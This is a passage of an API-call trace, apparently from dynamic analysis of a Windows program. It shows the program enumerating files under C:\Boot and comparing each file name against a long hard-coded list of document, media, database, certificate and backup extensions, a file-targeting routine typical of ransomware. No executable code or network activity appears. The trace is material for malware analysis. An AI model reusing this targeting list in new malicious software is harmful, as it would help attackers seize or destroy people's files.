(lpString1=".iqy", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".j2c") returned 4 [0285.074] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".j2k") returned 4 [0285.074] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.074] lstrlenW (lpString=".java") returned 5 [0285.074] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.074] lstrlenW (lpString=".jp2") returned 4 [0285.075] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".jpc") returned 4 [0285.075] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".jpe") returned 4 [0285.075] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".jpeg") returned 5 [0285.075] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.075] lstrlenW (lpString=".jpf") returned 4 [0285.075] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".jpg") returned 4 [0285.075] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".jpx") returned 4 [0285.075] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".js") returned 3 [0285.075] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.075] lstrlenW (lpString=".jsf") returned 4 [0285.075] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".json") returned 5 [0285.075] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.075] lstrlenW (lpString=".jsp") returned 4 [0285.075] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".kdc") returned 4 [0285.075] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".kmz") returned 4 [0285.075] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".kwm") returned 4 [0285.075] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.075] lstrlenW (lpString=".lasso") returned 6 [0285.076] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.076] lstrlenW (lpString=".lbi") returned 4 [0285.076] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".lgf") returned 4 [0285.076] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".lgp") returned 4 [0285.076] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".log") returned 4 [0285.076] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".m1v") returned 4 [0285.076] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".m4a") returned 4 [0285.076] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".m4v") returned 4 [0285.076] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".max") returned 4 [0285.076] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".md") returned 3 [0285.076] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.076] lstrlenW (lpString=".mda") returned 4 [0285.076] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".mdb") returned 4 [0285.076] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".mde") returned 4 [0285.076] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.076] lstrlenW (lpString=".mdf") returned 4 [0285.077] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mdw") returned 4 [0285.077] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mef") returned 4 [0285.077] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mft") returned 4 [0285.077] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mfw") returned 4 [0285.077] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mht") returned 4 [0285.077] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mhtml") returned 6 [0285.077] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.077] lstrlenW (lpString=".mka") returned 4 [0285.077] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mkidx") returned 6 [0285.077] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.077] lstrlenW (lpString=".mkv") returned 4 [0285.077] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mos") returned 4 [0285.077] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mov") returned 4 [0285.077] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mp3") returned 4 [0285.077] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.077] lstrlenW (lpString=".mp4") returned 4 [0285.078] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.078] lstrlenW (lpString=".mpeg") returned 5 [0285.078] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.078] lstrlenW (lpString=".mpg") returned 4 [0285.078] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.078] lstrlenW (lpString=".mpv") returned 4 [0285.078] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.078] lstrlenW (lpString=".mrw") returned 4 [0285.078] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.078] lstrlenW (lpString=".msg") returned 4 [0285.078] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.078] lstrlenW (lpString=".mxl") returned 4 [0285.078] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".myd") returned 4 [0285.078] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".myi") returned 4 [0285.078] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".nef") returned 4 [0285.078] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".nrw") returned 4 [0285.078] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".obj") returned 4 [0285.078] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".odb") returned 4 [0285.078] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".odc") returned 4 [0285.078] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.078] lstrlenW (lpString=".odm") returned 4 [0285.079] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".odp") returned 4 [0285.079] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".ods") returned 4 [0285.079] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".oft") returned 4 [0285.079] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".one") returned 4 [0285.079] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".onepkg") returned 7 [0285.079] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.079] lstrlenW (lpString=".onetoc2") returned 8 [0285.079] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.079] lstrlenW (lpString=".opt") returned 4 [0285.079] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".oqy") returned 4 [0285.079] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".orf") returned 4 [0285.079] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".p12") returned 4 [0285.079] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".p7b") returned 4 [0285.079] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".p7c") returned 4 [0285.079] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".pam") returned 4 [0285.079] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.079] lstrlenW (lpString=".pbm") returned 4 [0285.080] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pct") returned 4 [0285.080] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pcx") returned 4 [0285.080] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pdd") returned 4 [0285.080] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pdf") returned 4 [0285.080] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pdp") returned 4 [0285.080] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pef") returned 4 [0285.080] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pem") returned 4 [0285.080] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pff") returned 4 [0285.080] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pfm") returned 4 [0285.080] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pfx") returned 4 [0285.080] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".pgm") returned 4 [0285.080] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".php") returned 4 [0285.080] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.080] lstrlenW (lpString=".php3") returned 5 [0285.080] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.080] lstrlenW (lpString=".php4") returned 5 [0285.081] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".php5") returned 5 [0285.081] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".phtml") returned 6 [0285.081] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.081] lstrlenW (lpString=".pict") returned 5 [0285.081] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".pl") returned 3 [0285.081] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.081] lstrlenW (lpString=".pls") returned 4 [0285.081] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.081] lstrlenW (lpString=".pm") returned 3 [0285.081] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.081] lstrlenW (lpString=".png") returned 4 [0285.081] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.081] lstrlenW (lpString=".pnm") returned 4 [0285.081] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.081] lstrlenW (lpString=".pot") returned 4 [0285.081] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.081] lstrlenW (lpString=".potm") returned 5 [0285.081] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".potx") returned 5 [0285.081] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".ppa") returned 4 [0285.081] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.081] lstrlenW (lpString=".ppam") returned 5 [0285.081] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.081] lstrlenW (lpString=".ppm") returned 4 [0285.082] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pps") returned 4 [0285.082] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".ppsm") returned 5 [0285.082] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.082] lstrlenW (lpString=".ppt") returned 4 [0285.082] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pptm") returned 5 [0285.082] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.082] lstrlenW (lpString=".pptx") returned 5 [0285.082] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.082] lstrlenW (lpString=".prn") returned 4 [0285.082] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".ps") returned 3 [0285.082] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.082] lstrlenW (lpString=".psb") returned 4 [0285.082] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".psd") returned 4 [0285.082] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pst") returned 4 [0285.082] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".ptx") returned 4 [0285.082] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pub") returned 4 [0285.082] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pwm") returned 4 [0285.082] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.082] lstrlenW (lpString=".pxr") returned 4 [0285.082] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.083] lstrlenW (lpString=".py") returned 3 [0285.083] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.083] lstrlenW (lpString=".qt") returned 3 [0285.083] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.083] lstrlenW (lpString=".r3d") returned 4 [0285.083] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.083] lstrlenW (lpString=".raf") returned 4 [0285.083] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.083] lstrlenW (lpString=".rar") returned 4 [0285.083] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.083] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.083] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0285.083] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.083] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="en-US", cAlternateFileName="")) returned 1 [0285.084] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.084] lstrlenW (lpString="C:\\Boot\\en-US") returned 13 [0285.084] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0285.084] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.084] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.084] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.084] lstrlenW (lpString=".1cd") returned 4 [0285.084] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.084] lstrlenW (lpString=".3ds") returned 4 [0285.084] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.084] lstrlenW (lpString=".3fr") returned 4 [0285.084] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.084] lstrlenW (lpString=".3g2") returned 4 [0285.084] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.084] lstrlenW (lpString=".3gp") returned 4 [0285.084] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.084] lstrlenW (lpString=".7z") returned 3 [0285.085] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.085] lstrlenW (lpString=".accda") returned 6 [0285.085] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".accdb") returned 6 [0285.085] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".accdc") returned 6 [0285.085] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".accde") returned 6 [0285.085] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".accdt") returned 6 [0285.085] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".accdw") returned 6 [0285.085] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.085] lstrlenW (lpString=".adb") returned 4 [0285.085] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".adp") returned 4 [0285.085] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".ai") returned 3 [0285.085] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.085] lstrlenW (lpString=".ai3") returned 4 [0285.085] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".ai4") returned 4 [0285.085] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".ai5") returned 4 [0285.085] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".ai6") returned 4 [0285.085] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.085] lstrlenW (lpString=".ai7") returned 4 [0285.085] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".ai8") returned 4 [0285.086] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".anim") returned 5 [0285.086] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.086] lstrlenW (lpString=".arw") returned 4 [0285.086] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".as") returned 3 [0285.086] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.086] lstrlenW (lpString=".asa") returned 4 [0285.086] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".asc") returned 4 [0285.086] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".ascx") returned 5 [0285.086] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.086] lstrlenW (lpString=".asm") returned 4 [0285.086] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".asmx") returned 5 [0285.086] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.086] lstrlenW (lpString=".asp") returned 4 [0285.086] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".aspx") returned 5 [0285.086] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.086] lstrlenW (lpString=".asr") returned 4 [0285.086] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".asx") returned 4 [0285.086] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".avi") returned 4 [0285.086] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.086] lstrlenW (lpString=".avs") returned 4 [0285.086] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".backup") returned 7 [0285.087] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.087] lstrlenW (lpString=".bak") returned 4 [0285.087] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".bay") returned 4 [0285.087] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".bd") returned 3 [0285.087] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.087] lstrlenW (lpString=".bin") returned 4 [0285.087] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".bmp") returned 4 [0285.087] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".bz2") returned 4 [0285.087] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".c") returned 2 [0285.087] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.087] lstrlenW (lpString=".cdr") returned 4 [0285.087] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".cer") returned 4 [0285.087] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".cf") returned 3 [0285.087] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.087] lstrlenW (lpString=".cfc") returned 4 [0285.087] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".cfm") returned 4 [0285.087] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.087] lstrlenW (lpString=".cfml") returned 5 [0285.087] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.088] lstrlenW (lpString=".cfu") returned 4 [0285.088] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".chm") returned 4 [0285.088] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".cin") returned 4 [0285.088] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".class") returned 6 [0285.088] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.088] lstrlenW (lpString=".clx") returned 4 [0285.088] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".config") returned 7 [0285.088] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.088] lstrlenW (lpString=".cpp") returned 4 [0285.088] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".cr2") returned 4 [0285.088] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".crt") returned 4 [0285.088] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".crw") returned 4 [0285.088] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".cs") returned 3 [0285.088] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.088] lstrlenW (lpString=".css") returned 4 [0285.088] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".csv") returned 4 [0285.088] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.088] lstrlenW (lpString=".cub") returned 4 [0285.088] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dae") returned 4 [0285.089] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dat") returned 4 [0285.089] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".db") returned 3 [0285.089] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.089] lstrlenW (lpString=".dbf") returned 4 [0285.089] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dbx") returned 4 [0285.089] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dc3") returned 4 [0285.089] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dcm") returned 4 [0285.089] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dcr") returned 4 [0285.089] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".der") returned 4 [0285.089] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dib") returned 4 [0285.089] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dic") returned 4 [0285.089] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".dif") returned 4 [0285.089] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.089] lstrlenW (lpString=".divx") returned 5 [0285.089] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.089] lstrlenW (lpString=".djvu") returned 5 [0285.089] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.090] lstrlenW (lpString=".dng") returned 4 [0285.090] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".doc") returned 4 [0285.090] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".docm") returned 5 [0285.090] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.090] lstrlenW (lpString=".docx") returned 5 [0285.090] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.090] lstrlenW (lpString=".dot") returned 4 [0285.090] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dotm") returned 5 [0285.090] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.090] 